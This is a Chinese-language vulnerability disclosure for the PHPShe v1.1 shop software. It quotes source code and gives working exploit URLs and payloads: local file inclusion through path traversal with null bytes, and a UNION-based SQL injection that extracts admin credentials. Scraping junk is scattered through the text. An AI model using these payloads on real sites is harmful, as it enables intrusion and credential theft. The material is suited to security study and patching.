phpshe v1.1多处SQL注入和文件包含漏洞Getshell

admin

/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
$ f4 O) K/ U7 O  c8 ]0×00 整体大概参数传输
# N/ Z6 q4 ]6 T# _+ f: e# ?
) M$ \. s8 s1 v" W' u
1 |8 |% Y1 y0 t) E% Y7 w
$ E9 Q, b4 L6 {' X$ v5 B//common.php
3 A& z2 B/ m1 v, N7 f2 G3 r7 V5 E2 mif (get_magic_quotes_gpc()) {
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
: p- H+ r0 S( y}
1 G# ]' l) X1 E5 |+ N$ o6 c, }else {
8 }$ ]. q/ B) a: P!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
# i2 o! M7 O+ j$ {: i, J* \  [3 p!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
1 J! r& T6 V+ Y' Y# j!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');

0×01 包含漏洞

: J* }+ @. w1 N/ ~$ u1 @
" R8 Y1 C# M( x# }1 F- F; o* T4 _//首页文件
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
- T6 G4 K* @5 E1 t2 k* pinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
. x7 O' E* e* @pe_result();
?>
( {+ T4 J( g% C2 N//common 文件 第15行开始
url路由配置
$module = $mod = $act = 'index';
" r# C2 o' l8 b3 V* x1 |$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
- G: m) y' J* a: V  }3 o7 W% G8 \/ F$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
$ L. @5 t. W8 ?( e  [3 h//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
) `; _# ^; V  j9 v% z8 L

* n7 r8 q. t7 l# u3 e
% ~1 i- `( A* F2 i 0×02 搜索注入
3 E; I* M/ m; `) D7 A- D1 n
( _% Y( C2 e& |<code id="code2">

//product.php文件
0 {2 |8 K, O' ?. ]' O6 Tcase 'list':
$category_id = intval($id);
2 U  g! n/ J* n3 `; \$info = $db->pe_select('category', array('category_id'=>$category_id));
8 S: X# E: U  q+ P//搜索
$sqlwhere = " and `product_state` = 1";
pe_lead('hook/category.hook.php');
$ A1 y  L1 Q. J$ _! d6 z  bif ($category_id) {
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
}
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
* p  O7 P( ~) X$ A1 q  f# F( n' _if ($_g_orderby) {
* P2 v) l4 R6 c0 `% Q5 K6 m$ {$orderby = explode('_', $_g_orderby);
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
}
else {
6 x' ^! I# X# U" R0 j! T/ d  \" m$sqlwhere .= " order by `product_id` desc";
}
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
$ c: O2 M: }4 o% X/ |% F//热卖排行
; W& Q4 V8 U4 {9 E# G( d7 K" w$product_hotlist = product_hotlist();
/ C/ q% v- x% h  ]# I//当前路径
$nowpath = category_path($category_id);
, H! l- t) B+ f' f$seo = pe_seo($info['category_name']);
. I8 ?( F' M- N3 R; ginclude(pe_tpl('product_list.html'));
) H. ?- J7 a8 l6 }//跟进selectall函数库
  b% `" p: }6 Z5 h: npublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
; l: Z* K9 d# E8 ^6 S3 x//处理条件语句
$sqlwhere = $this->_dowhere($where);
3 S) V9 n; _3 K+ treturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}
/ V! U0 |5 ?- T, m* L1 f//exp
: n  [/ {) e* W! V3 d, O8 k# f4 Xproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
: o- I# d  n+ e9 x" W! U

</code>
$ I* Q; \2 l4 O4 o/ H
0×03 包含漏洞2

<code id="code3">

//order.php

case 'pay':

4 G! J7 v' Y' d4 Q& @4 ^# `, Z$order_id = pe_dbhold($_g_id);

$cache_payway = cache::get('payway');

2 l  E3 X7 p! Y* T8 Q: Y& e6 Iforeach($cache_payway as $k => $v) {

" b* h$ P# W- C4 g$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

if ($k == 'bank') {

$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

}

}

$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

0 X$ I* l/ r: d' @% D7 @% k) v!$order['order_id'] && pe_error('订单号错误...');

$ s& H  @8 t! w/ a  Z7 X/ eif (isset($_p_pesubmit)) {

  I+ s1 ^2 m; l9 uif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

: n1 {. L0 h( D$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

foreach ($info_list as $v) {

$order['order_name'] .= "{$v['product_name']};";

5 s* y9 z! B0 m5 `, |}

echo '正在为您连接支付网站，请稍后...';

include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

2 I) Q' u& o. k+ l( C9 t}//当一切准备好的时候就可以进行"鸡肋包含了"

else {

pe_error('支付错误...');

& X# \* Y! r* V& a$ A( }  M) [}

7 [# o3 U1 t0 o3 g- E- K}

$seo = pe_seo('选择支付方式');

include(pe_tpl('order_pay.html'));

break;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>